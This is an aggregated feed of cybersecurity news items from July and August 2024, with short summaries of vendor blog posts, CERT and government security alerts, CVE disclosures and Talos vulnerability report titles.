Earlier this week, NIST officially announced three standards specifying FIPS-approved algorithms for post-quantum cryptography. The Stateless Hash-Based Digital Signature Algorithm (SLH-DSA) is one of these standardized algorithms. The Trail of Bits cryptography team has been anticipating this announcement, and we are excited to share an announcement of our own: we built an […]

https://blog.trailofbits.com/2024/08/15/we-wrote-the-code-and-the-code-won/
Overwhelmed by OT Security Vendors? Find the Perfect Partner
2024-08-15T07:00:00Z | 1723705200

Good news: If you’re thinking about finding an OT cybersecurity vendor, you’re already well ahead of many discrete manufacturing companies.

https://blog.scadafence.com/ot-security-vendors-find-perfect-partner-discrete-manufacturing-company
Choosing an Optimal Algorithm for AI in Cybersecurity by Sohrob Kazerounian
2024-08-15T00:00:00Z | 1723680000

A look at the misunderstood No-Free-Lunch theorems—and how a crude generalization can still reveal a valuable insight about search and optimization.

https://www.vectra.ai/blog/choosing-an-optimal-algorithm-for-ai-in-cybersecurity
Cisco Reports Fourth Quarter And Fiscal Year 2024 Earnings
2024-08-14T20:05:00Z | 1723665900

Cisco reported fourth quarter revenue of $13.6 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.2 billion or $0.54 per share, and non-GAAP net income of $3.5 billion or $0.87 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m08/cisco-reports-fourth-quarter-and-fiscal-year-2024-earnings.html
ESG Watch | Special edition: Carbon credits | August 2024
2024-08-14T13:39:37Z | 1723642777

Introduction Carbon credits have become an important tool in global efforts to combat climate change, offering a market-based solution for reducing greenhouse gas emissions. At their core, carbon credits function as tradable certificates that represent the reduction or removal of one metric ton of carbon dioxide (or its equivalent) from the atmosphere. These credits can be generated through a variety of projects, including reforestation, renewable energy installations, methane capture, and improvements in energy efficiency. By purchasing carbon credits, companies or individuals can offset their carbon emissions, effectively balancing their carbon footprint. However, for carbon credits to be truly effective, they must meet rigorous criteria: additionality, which ensures that the emissions reductions would not have happened without the incentive provided by the credit; permanence, which guarantees that the carbon sequestered or emissions avoided are maintained over the long term; and verifiability, which requires independent third-party verification of the emissions reductions.

https://www.s-rminform.com/esg-watch/special-edition-carbon-credits-august-2024
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. augusztus
2024-08-14T13:21:07Z | 1723641667

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-augusztus/
Akamai Guardicore Platform: Microsegmentation Just Got a Whole Lot Better
2024-08-14T13:00:00Z | 1723640400

Akamai introduces new microsegmentation features to the Akamai Guardicore Platform to help organizations further refine their security posture.

https://www.akamai.com/blog/security/2024/aug/akamai-guardicore-platform-microsegmentation-just-got-whole-lot-better
Cyber weather for July 2024
2024-08-14T06:12:39Z | 1723615959

In July, the cyber weather was somewhat calmer than in previous months. However, there were significant events in July when the upgrade of the CrowdStrike security product caused a widespread disruption around the world. Regarding scam messages, tax refund-themed messages began to become more common again in anticipation of tax refunds in early August.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2024
Cyber weather for July 2024
2024-08-14T06:12:39Z | 1723615959

In July, the cyber weather was somewhat calmer than in previous months. However, there were significant events in July when the upgrade of the CrowdStrike security product caused a widespread disruption around the world. Regarding scam messages, tax refund-themed messages began to become more common again in anticipation of tax refunds in early August.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2024
High Threat Security Alert (A24-08-07): Multiple Vulnerabilities in Microsoft Products (August 2024)
2024-08-14T04:00:00Z | 1723608000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-08-08): Multiple Vulnerabilities in Adobe Reader/Acrobat
2024-08-14T04:00:00Z | 1723608000

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Navigating the different cyber services from the NCSC
2024-08-13T15:05:00Z | 1723561500

If you don’t have the inhouse expertise to keep your organisation cyber secure, the NCSC offers services and tools to help organisations guard against commodity threats.

https://www.ncsc.gov.uk/blog-post/navigating-ncsc-cyber-service
Q2 2024 Cato CTRL SASE Threat Report
2024-08-13T14:52:13Z | 1723560733

The post Q2 2024 Cato CTRL SASE Threat Report  appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-cato-ctrl-sase-threat-report-q2-2024/
CVE-2024-6619
2024-08-13T14:36:00Z | 1723559760

CWE-732: Overriding critical files The vulnerability, if exploited, could allow a miscreant to read and write an AVEVA Reports for Operations project and/or tamper with installation files

https://claroty.com/team82/disclosure-dashboard/cve-2024-6619
CVE-2024-6618
2024-08-13T14:34:00Z | 1723559640

CWE-22: Path Traversal leading to Arbitrary Code Execution The vulnerability, if exploited, could allow a miscreant to execute arbitrary code under the privileges of an interactive AVEVA Reports for Operations user.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6618
Highlights from Q2 2024 Cato CTRL SASE Threat Report
2024-08-13T04:00:00Z | 1723521600

Introduction   At RSA Conference 2024, Cato Networks introduced Cato CTRL (Cyber Threats Research Lab), which is our cyber threat intelligence (CTI) team. Cato CTRL protects organizations by collecting, analyzing and reporting on external and internal threats, utilizing the data lake underlying the Cato SASE Cloud Platform.  For 2024, Cato CTRL is publishing quarterly threat reports... The post Highlights from Q2 2024 Cato CTRL SASE Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/highlights-from-q2-2024-cato-ctrl-sase-threat-report/
Microsoft CLIPSP.SYS License update privilege escalation vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1966
Microsoft CLIPSP.SYS License update signature check bypass vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1964
Microsoft Windows CLIPSP.SYS License Update Field Type 0xD3 out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1970
Microsoft Windows CLIPSP.SYS License Update Field Type 0xC9 out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1968
Adobe Acrobat Reader Font gvar TupleVariation Data Out-Of-Bounds Read Vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2002
Adobe Acrobat Reader Font Packed Point Numbers Out-Of-Bounds Read Vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2003
Adobe Acrobat Reader AV3DVirtAnnot Object Format Event Use-After-Free Vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2009
Microsoft CLIPSP.SYS License update out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1965
Microsoft Windows CLIPSP.SYS License Update Field Type 0x20 out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1969
Microsoft Windows CLIPSP.SYS License Update Field Type 0xCC out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1971
Microsoft CLIPSP.SYS License Update out-of-bounds read vulnerability
2024-08-13T00:00:00Z | 1723507200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1988
Trail of Bits Advances to AIxCC Finals
2024-08-12T23:23:13Z | 1723504993

Trail of Bits has qualified for the final round of DARPA’s AI Cyber Challenge (AIxCC)! Our Cyber Reasoning System, Buttercup, placed in the top 7 out of 39 teams competing in the semifinal round held at DEF CON 2024. Competition Overview The AIxCC semifinal featured a series of challenges based on real-world software, including nginx, […]

https://blog.trailofbits.com/2024/08/12/trail-of-bits-advances-to-aixcc-finals/
Taking Steps to Prepare for Quantum Advantage
2024-08-12T14:00:00Z | 1723471200

https://www.akamai.com/blog/security/2024/aug/taking-steps-to-prepare-for-quantum-advantage
Security alert Jenkins CVE-2024-36401: Stormshield’s product response
2024-08-12T11:45:19Z | 1723463119

A new critical Remote Code Execution (RCE) vulnerability impacting GeoServer has been reported. It has been assigned the reference CVE-2024-36401 and a CVSS 3.1 score of 9.8. The Stormshield Customer Security Lab details our protection offerings. It should be noted that an important number of... The post Security alert Jenkins CVE-2024-36401: Stormshield’s product response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-jenkins-cve-2024-36401-stormshields-product-response/
Practical tips for debugging Flask under remote uWSGI with rpdb
2024-08-12T10:14:14Z | 1723457654

This is a short post describing how to debug Flask apps with the ever-useful rpdb, along with a few gotchas to be careful of. Our workhorse web backend is Flask+uWSGI, running on standalone EC2 instances. At the same time we rely on Twisted for several backend services. On occasion a Thinkster might need to debug one of these services on one of the EC2 instances. Due to our instance isolation strategy, it’s tricky to get fancy remote debugging running, such as VS Code’s Remote Debugging. Flask has a built-in debugger which may work for you. We ban it at the web server to ensure it’s never accessible. Instead, we often reach for rpdb. The requirements for this approach are minimal: Why rpdb? Rpdb is an extremely thin wrapper that makes Python’s default debugger (pdb) network accessible. It’s not featureful, and the CLI has no history, or readline-style editing capabilities. It hasn’t been updated in 8 years. So why do we like rpdb? It’s simple: the package is tiny, has no additional dependencies, and does exactly what we need. We don’t reach for it when doing heavy development, it’s used essentially to inspect internal program state when single-stepping through some section […]

https://blog.thinkst.com/2024/08/practical-tips-for-debugging-flask-under-remote-uwsgi-with-rpdb.html
Navigating the Compliance Maze: How to Choose Cybersecurity Products That Comply with OT Security Regulations
2024-08-12T07:46:08Z | 1723448768

In today’s interconnected digital landscape, cybersecurity is no longer a mere afterthought—it’s a fundamental requirement for any organization, particularly those operating in critical infrastructure and industrial sectors like oil and gas, energy, food and beverage, manufacturing, and transportation. As Operational Technology (OT) systems increasingly face the internet and interconnect with IT networks, and as the […] The post Navigating the Compliance Maze: How to Choose Cybersecurity Products That Comply with OT Security Regulations appeared first on Radiflow.

https://www.radiflow.com/blog/navigating-the-compliance-maze-how-to-choose-cybersecurity-products-that-comply-with-ot-security-regulations/
Trail of Bits’ Buttercup heads to DARPA’s AIxCC
2024-08-09T13:10:29Z | 1723209029

With DARPA’s AI Cyber Challenge (AIxCC) semifinal starting today at DEF CON 2024, we want to introduce Buttercup, our AIxCC submission. Buttercup is a Cyber Reasoning System (CRS) that combines conventional cybersecurity techniques like fuzzing and static analysis with AI and machine learning to find and fix software vulnerabilities. The system is designed to operate […]

https://blog.trailofbits.com/2024/08/09/trail-of-bits-buttercup-heads-to-darpas-aixcc/
Git-Syncing into Trouble: Exploring Command Injection Flaws in Kubernetes
2024-08-09T11:00:00Z | 1723201200

https://www.akamai.com/blog/security-research/2024/aug/2024-august-kubernetes-gitsync-command-injection-defcon
National Cyber Security Centre's weekly review – 32/2024
2024-08-09T10:10:33Z | 1723198233

This week we will talk about what you can do if your personal data gets into the wrong hands. As scammers do not rest even during summer, we will also remind you about scam messages sent under Traficom’s name.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-322024
National Cyber Security Centre's weekly review – 32/2024
2024-08-09T10:10:33Z | 1723198233

This week we will talk about what you can do if your personal data gets into the wrong hands. As scammers do not rest even during summer, we will also remind you about scam messages sent under Traficom’s name.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-322024
Security Alert (A24-08-06): Multiple Vulnerabilities in Microsoft Edge
2024-08-09T04:00:00Z | 1723176000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Gotta cache 'em all: bending the rules of web cache exploitation
2024-08-08T22:27:46Z | 1723156066

Through the years, we have seen many attacks exploiting web caches to hijack sensitive information or store malicious payloads. However, as CDNs became more popular, new discrepancies between propriet

https://portswigger.net/research/gotta-cache-em-all
Improving Apache httpd Protections Proactively with Orange Tsai of DEVCORE
2024-08-08T15:00:00Z | 1723129200

https://www.akamai.com/blog/security-research/2024/aug/2024-august-apache-waf-proactive-collaboration-orange-tsai-devcore
Vulnerability in KAON AR2140 routers firmware
2024-08-08T11:00:00Z | 1723114800

Command Injection vulnerability (CVE-2024-3659) has been found in KAON AR2140 routers firmware.

https://cert.pl/en/posts/2024/08/CVE-2024-3659/
Juulikuu küberruumis: õngitsuskirjade levik ja globaalne katkestus
2024-08-08T06:25:50Z | 1723098350

Riigi Infosüsteemi Ameti (RIA) intsidentide lahendamise osakond (CERT-EE) registreeris juulis 675 mõjuga küberintsidenti, mis on viimase poole aasta kõige kõrgem näitaja. Üle poole registreeritud intsidentidest olid õngitsuslehed, mida avastati 360 ning mida kasutatakse aina enam inimestelt raha või kontoandmete välja petmisel.

https://ria.ee/uudised/juulikuu-kuberruumis-ongitsuskirjade-levik-ja-globaalne-katkestus
High Threat Security Alert (A24-08-04): Multiple Vulnerabilities in Microsoft Windows
2024-08-08T04:00:00Z | 1723089600

Microsoft has released out-of-band security advisories to address the vulnerabilities in Microsoft Windows and Server.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-08-05): Multiple Vulnerabilities in Cisco Products
2024-08-08T04:00:00Z | 1723089600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Redefining Identity Security for the Expanding Identity and GenAI Threat Environment by Vectra AI Product Team
2024-08-08T00:00:00Z | 1723075200

Identity is the center of the modern enterprise and it takes just one compromised identity for attackers to quickly navigate complex network systems and steal critical data.

https://www.vectra.ai/blog/redefining-identity-security-for-the-expanding-identity-and-genai-threat-environment
Do well by doing good: our Thinkst Canary Bags
2024-08-07T22:25:03Z | 1723069503

If you’ve gotten a gift from us in the past few years, it would have shown up in a bag like this one: Here’s the story behind that bag… Carrying Our Values With Us One of our core Thinkst values is to “do well by doing good” (we actually have 4 of them).  We donate to Open Source projects we use. We offer no-strings-attached bursaries to South African tertiary students. We support local charities who protect, uplift, and believe in our most vulnerable populations.  The first core value is delight: We delight our customers. With our product, with our support, and even with our gifts, we strive to delight our customers. We pride ourselves on sweating the small stuff; gifts get vetted internally (from shirts, to tools, to flasks) long before they get sent to customers. We wrap, we write notes, we sprinkle it with green. And, on some happy occasions, we get to combine these two values.  Who doesn’t love to unwrap a gift? The suspense, the surprise, the love; it’s all there. As well as the single-use wrapping paper that lands up in the bin… So, we decided to rethink our gift wrapping. We still wanted our gifts to […]

https://blog.thinkst.com/2024/08/do-well-by-doing-good-our-thinkst-canary-bags.html
Splitting the email atom: exploiting parsers to bypass access controls
2024-08-07T21:32:47Z | 1723066367

Some websites parse email addresses to extract the domain and infer which organisation the owner belongs to. This pattern makes email-address parser discrepancies critical. Predicting which domain an

https://portswigger.net/research/splitting-the-email-atom
Listen to the whispers: web timing attacks that actually work
2024-08-07T18:10:21Z | 1723054221

Websites are riddled with timing oracles eager to divulge their innermost secrets. It's time we started listening to them. In this paper, I'll unleash novel attack concepts to coax out server secrets

https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work
Living off the VPN ? Exploring VPN Post-Exploitation Techniques
2024-08-07T17:20:00Z | 1723051200

https://www.akamai.com/blog/security-research/2024/aug/2024-august-vpn-post-exploitation-techniques-black-hat
Akamai Blocked 419 TB of Malicious Traffic in a 24-Hour DDoS Attack
2024-08-07T14:00:00Z | 1723039200

https://www.akamai.com/blog/security/2024/aug/akamai-blocked-419-tb-of-malicious-traffic
Vulnerabilities in EZD RP software
2024-08-07T11:00:00Z | 1723028400

CERT Polska has received a report about 3 vulnerabilities (from CVE-2024-7265 to CVE-2024-7267) found in EZD RP software.

https://cert.pl/en/posts/2024/08/CVE-2024-7265/
Red Flag Bulletin | August 2024 | Department of Justice and Boeing file plea deal to settle fraud charges
2024-08-07T09:15:24Z | 1723022124

This month’s top stories: Airline manufacturer Boeing agrees to pay USD 487.2 million fine in plea deal to settle fraud charges after violating Deferred Prosecution Agreement in 737 Max aircraft case;   Lithuanian law enforcement imposes record EUR 9.3 million fine on Lithuanian operator of cryptocurrency platform for sanctions breaches and money laundering violations involving Russian clients; and  Board of directors of Zambia’s Anti-Corruption Commission dismissed after board member accuses fellow board directors of accepting bribes from Zambian politicians under investigation.  Europe  Albania: Former health minister arrested on suspicion of misappropriating EU funds  On 4 July, Ilir Beqaj, former health minister of Albania (2013-2017), was arrested on suspicion of misappropriating EU funds through fictitious public tenders. The Albanian Special Prosecutor’s Office against Corruption and Organised Crime (SPAK) alleges that Beqaj set up fictitious procurement procedures in at least eight tender competitions for EU-financed projects in Albania during his tenure at the Albanian State Agency for Strategic Programming and Aid Coordination (SASPAC), a national agency established to oversee national and regional EU financial programmes. SPAK’s investigation found that, between 2022 and 2023, SASPAC issued fraudulent invoices for incomplete services that were billed as legitimate expenses. These totalled hundreds of thousands of euros andimplicatedBeqaj’sclose associates. Beqajwas arrested on charges of passive and active corruption; refusal to declare, non-declaration, concealment or false declaration of assets; fraud; and violation of the equality of participants in tenders. Beqaj has denied all charges. If convicted, he could face a maximum prison sentence of 26 years.  Lithuania: Law enforcement agency imposes record EUR 9.3 million fine on operator of cryptocurrency platform for sanctions breaches  On 10 July, the Lithuanian Financial Crime Investigation Service (FCIS) imposed a record fine of EUR 9.3 million on UAB Payeer, a Lithuanian cryptocurrency platform operator, for sanctions and money laundering violations involving Russian clients. According to the FCIS, Payeer had allowed Russian customers to carry out transactions in Russian roubles by transferring funds between Payeer’s platformand Russian banks that are sanctioned by the EU. Payeer also allegedly offered cryptocurrency wallet, account management, and storage services to Russian individuals and entities. The FCIS additionally found that,to avoid losing revenue,Payeerhad not carried out the necessary KYC checkson its customers.Payeerreportedly relocated to Lithuania after losing its licence in Estonia when Estonia tightened regulations for cryptocurrency firms.

https://www.s-rminform.com/red-flag-bulletin/august-2024
Security Alert (A24-08-01): Multiple Vulnerabilities in Android
2024-08-07T04:00:00Z | 1723003200

Google has released Android Security Bulletin August 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-08-02): Multiple Vulnerabilities in Google Chrome
2024-08-07T04:00:00Z | 1723003200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-08-03): Multiple Vulnerabilities in Firefox
2024-08-07T04:00:00Z | 1723003200

Mozilla has published the advisories (MFSA2024-33, MFSA2024-34 and MFSA2024-35) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Registration is open for CyberChess 2024
2024-08-06T14:26:56Z | 1722954416

More than 50 speakers from 20 countries will share their experience on the protection of critical infrastructure, cyber threat intelligence, ransomware, nanotechnology, bio-hacking, AI, machine learning, and more.

https://cert.lv/en/2024/08/registration-is-open-for-cyberchess-2024
What Is an Event-Driven Microservices Architecture?
2024-08-06T13:00:00Z | 1722949200

https://www.akamai.com/blog/edge/2024/aug/what-is-an-event-driven-microservices-architecture
Lõppesid Eesti äpi arendustööd ning sügisest algab rakenduse avalik testimine
2024-08-06T09:14:26Z | 1722935666

Juuli lõpuga võttis Riigi Infosüsteemi Amet (RIA) lepingupartner Net Groupilt edukalt üle Eesti.ee mobiilirakenduse arendustööde teise etapi, millele järgneb turvatestimise periood.

https://ria.ee/uudised/loppesid-eesti-api-arendustood-ning-sugisest-algab-rakenduse-avalik-testimine
RIA korraldatud tüdrukute rahvusvaheline küberturbe laager tõi kokku 95 osalejat
2024-08-06T07:05:41Z | 1722927941

Riigi Infosüsteemi Amet (RIA) korraldas teist aastat järjest Raplamaal Kehtnas kuuepäevase rahvusvahelise noortelaagri Cyberwizards, et populariseerida tüdrukute seas küberturvalisuse teemasid. Sel aastal osales laagris 95 tüdrukut kümnest riigist.

https://ria.ee/uudised/ria-korraldatud-tudrukute-rahvusvaheline-kuberturbe-laager-toi-kokku-95-osalejat
Cloud cryptography demystified: Google Cloud Platform
2024-08-05T13:00:03Z | 1722862803

This post, the second in our series on cryptography in the cloud, provides an overview of the cloud cryptography services offered within Google Cloud Platform (GCP): when to use them, when not to use them, and important usage considerations. Stay tuned for future posts covering other cloud services. At Trail of Bits, […]

https://blog.trailofbits.com/2024/08/05/cloud-cryptography-demystified-google-cloud-platform/
It?s a New World: APIs Protected by the Power of N
2024-08-05T13:00:00Z | 1722862800

The world of APIs is changing fast ? as is what it takes to secure them. Our new Power of N campaign explains why.

https://www.akamai.com/blog/security/2024/aug/apis-protected-by-the-power-of-n
RIA eestvedamisel valmis uus elektroonilise identiteedi valdkonna strateegiline vaade
2024-08-05T10:53:36Z | 1722855216

Riigi Infosüsteemi Amet (RIA) sai koostöös avaliku sektori ning erasektori sidusrühmadega valmis elektroonilise identiteedi (eID) valge raamatu, mis kirjeldab eID valdkonna trende lähema viie kuni kümne aasta jooksul ning annab strateegilised suunad vähemalt järgnevaks viieks aastaks.

https://ria.ee/uudised/ria-eestvedamisel-valmis-uus-elektroonilise-identiteedi-valdkonna-strateegiline-vaade
Don't Become a Cyberattack Victim: Prevent OT Security Incidents
2024-08-05T08:00:00Z | 1722844800

Prevent Becoming a Cyberattack Victim - The SCADAfence's Cybersecurity Business Case When was the last time you came across a company that hadn’t had some IT security measures in place?

https://blog.scadafence.com/dont-fall-victim-ot-cyberattacks-effective-cybersecurity-business
Security Alert (A24-07-26): Multiple Vulnerabilities in Microsoft Edge
2024-08-02T04:00:00Z | 1722571200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Beyond the Limit: Expanding single-packet race condition with a first sequence sync for breaking the 65,535 byte limit
2024-08-02T00:00:00Z | 1722556800

Introduction Hello, I’m RyotaK (@ryotkak ), a security engineer at Flatt Security Inc. In 2023, James Kettle of PortSwigger published an excellent paper titled Smashing the state machine: the true potential of web race conditions. In the paper, he introduced a new attack technique called single-packet attack that can exploit a race condition without being affected by the network jitter.       Quoted from Smashing the state machine: the true potential of web race conditions Recently, I encountered a limit-overrun type of race condition that requires sending approximately 10,000 requests simultaneously to exploit reliably, so I attempted to apply the single packet attack to it. However, due to the single packet attack’s limitation, which restricts the maximum size of requests that can be sent to around 1,500 bytes, I couldn’t exploit the vulnerability.

https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/
National Cyber Security Centre's weekly review – 31/2024
2024-08-01T23:38:13Z | 1722555493

This week we are covering topics such as loan scams and how tax refunds due in the autumn are also of interest to criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-312024
National Cyber Security Centre's weekly review – 31/2024
2024-08-01T23:38:13Z | 1722555493

This week we are covering topics such as loan scams and how tax refunds due in the autumn are also of interest to criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-312024
Akamai?s Strategic and Transparent Implementation of AI
2024-08-01T13:00:00Z | 1722517200

https://www.akamai.com/blog/security/2024/aug/akamai-strategic-and-transparent-implementation-of-ai
CVE-2024-6242
2024-08-01T11:05:00Z | 1722510300

CWE-420: Unprotected Alternate Channel A vulnerability exists in the affected products that allows a threat actor to bypass certain communications restrictions between slots in a 1756 chassis. If exploited on any affected module in a 1756 chassis, a threat actor could potentially execute CIP programming and configuration commands on a Logix controller in the chassis. Read Team82's research blog.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6242
Drew Orsinger Joins Fidelis Security as Chief Technology Officer
2024-08-01T10:22:38Z | 1722507758

RIVERSIDE, Calif., July 31, 2024 /PRNewswire/ — Fidelis Security is pleased to announce the appointment of Drew Orsinger as its new Chief Technology Officer (CTO). Drew brings over 25 years of experience in the security field, with a distinguished career spanning both government and private sectors. Drew previously served as Chief Security Officer (CSO) for SpaceX, Honeywell, and CME […] The post Drew Orsinger Joins Fidelis Security as Chief Technology Officer appeared first on Fidelis Security.

https://fidelissecurity.com/press/drew-orsinger-joins-fidelis-security-as-chief-technology-officer/
The Tortilla Test: Ensuring Your Vulnerability Intelligence is Always Fresh
2024-08-01T00:00:00Z | 1722470400

Discover how GreyNoise’s fresh, real-time vulnerability prioritization tool offers actionable insights into current threats, just like homemade tortillas are always better when made from scratch. Find out how to keep your security team ahead with up-to-date intelligence that ensures you’re tackling the most pressing vulnerabilities effectively.

https://www.greynoise.io/blog/the-tortilla-test-ensuring-your-vulnerability-intelligence-is-always-fresh
Get Parent Portal and Student Safety Modules for Free until the End of December!
2024-07-31T20:18:02Z | 1722457082

Empower Parents and Protect Students with iboss At No Additional Cost! Sign up for a 3+ year contract and get our new Parent Portal and Student Safety modules for free. iboss is the leader in securing students in K12 and Education. The iboss Parent Portal enables parents to monitor and manage their children’s online activity... The post Get Parent Portal and Student Safety Modules for Free until the End of December! appeared first on iboss.

https://www.iboss.com/education/k12-promotion/
Take Cover: Securing Games Truly Is a Battle Royale
2024-07-31T14:00:00Z | 1722434400

https://www.akamai.com/blog/security-research/2024/jul/2024-games-security-trends-is-a-battle-royale
5 Things SASE Does that SD-WAN Can’t
2024-07-31T07:19:37Z | 1722410377

The post 5 Things SASE Does that SD-WAN Can’t appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-5-things-sase-does-that-sdwan-cant
Security Alert (A24-07-25): Multiple Vulnerabilities in Google Chrome
2024-07-31T04:00:00Z | 1722398400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Graylog Named a ‘Leader’ and ‘Fast Mover’ in GigaOm 2024 Radar Report for SIEM
2024-07-30T15:00:29Z | 1722351629

Graylog has been named a ‘Leader’ and ‘Fast Mover’ in GigaOm’s 2024 SIEM Radar Report. This recognition highlights Graylog’s innovative approach and superior threat detection and incident response functionality. The post Graylog Named a ‘Leader’ and ‘Fast Mover’ in GigaOm 2024 Radar Report for SIEM appeared first on Graylog.

https://graylog.org/news/graylog-named-a-leader-and-fast-mover-in-gigaom-2024-radar-report-for-siem/
Our audit of Homebrew
2024-07-30T13:00:34Z | 1722344434

This is a joint post with the Homebrew maintainers; read their announcement here! Last summer, we performed an audit of Homebrew. Our audit’s scope included Homebrew/brew itself (home of the brew CLI), and three adjacent repositories responsible for various security-relevant aspects of Homebrew’s operation: Homebrew/actions: a repository of custom GitHub Actions used […]

https://blog.trailofbits.com/2024/07/30/our-audit-of-homebrew/
Vulnerability in Stackposts Social Marketing Tool software
2024-07-30T13:00:00Z | 1722344400

Cross-site Scripting vulnerability (CVE-2024-7127) has been found in Stackposts Social Marketing Tool software.

https://cert.pl/en/posts/2024/07/CVE-2024-7127/
Why (and How) APIs and Web Applications Are Under Siege
2024-07-30T13:00:00Z | 1722344400

Read a summary of the latest SOTI report, which tackles the security risks in web applications and APIs, and the infrastructure that powers them

https://www.akamai.com/blog/security-research/why-and-how-apis-web-applications-are-under-siege
A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments
2024-07-30T09:17:54Z | 1722331074

The Role of the CISO Post-Pandemic  The world has evolved and the on-going momentum of Cloud and Work-From-Anywhere (WFA) has become unstoppable.  CISOs have realized their traditional security architectures, specifically VPNs, are no longer adequate to ensure only authorized users have access to critical resources.   This has made the role of CISO ever more important... The post A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments appeared first on Cato Networks.

https://www.catonetworks.com/blog/cisos-guide-avoiding-common-pitfalls-of-zero-trust-deployments/
Security Alert (A24-07-24): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-07-30T04:00:00Z | 1722312000

Apple has released iOS 16.7.9, iOS 17.6, iPadOS 16.7.9 and iPadOS 17.6 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. július
2024-07-29T13:40:49Z | 1722260449

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-julius/
Keep Your Tech Flame Alive: Akamai Trailblazer Elizabeth Padley
2024-07-29T13:00:00Z | 1722258000

In this Akamai FLAME Trailblazer blog, Elizabeth Padley tells us that as an international employment lawyer in tech, she has learned to expect the unexpected.

https://www.akamai.com/blog/culture/2024/jul/keep-your-tech-flame-alive-akamai-trailblazer-elizabeth-padley
Cyber weather for June 2024
2024-07-29T11:11:29Z | 1722251489

June appeared more peaceful on many cyber fronts compared to previous months. Then again, phishing messages and phishing for Microsoft 365 user accounts continued. It is good to remember to take care of the information security of organisations even during the summer.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_06/2024
Cyber weather for June 2024
2024-07-29T11:11:29Z | 1722251489

June appeared more peaceful on many cyber fronts compared to previous months. Then again, phishing messages and phishing for Microsoft 365 user accounts continued. It is good to remember to take care of the information security of organisations even during the summer.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_06/2024
How Senior Managers Can Transform Their Approach to OT Cybersecurity Product Selection
2024-07-29T07:54:20Z | 1722239660

